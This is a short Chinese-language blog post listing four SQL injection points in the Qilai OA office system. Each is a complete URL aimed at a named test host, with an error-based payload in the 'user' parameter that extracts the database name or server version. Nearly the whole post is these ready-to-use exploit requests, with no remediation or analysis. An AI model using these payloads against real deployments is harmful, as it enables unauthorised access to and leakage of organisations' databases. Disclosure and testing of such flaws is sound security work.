启莱OA系统sql注入4处

注入一
访问
http://test.oawin.net:5656/client/treelist.aspx?user=’ and (select db_name())>0–&pwd=1
1
注入二
访问
http://test.oawin.net:5656/client/messageurl.aspx?user=’ and (select db_name())>0–&pwd=1
1
注入三
访问
http://test.oawin.net:5656/client/GetUser.aspx?user=’ and @@version>0–
1
注入四
访问
http://test.oawin.net:5656/client/CloseMsg.aspx?user=’ and @@version>0–&1

1pwd=a

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录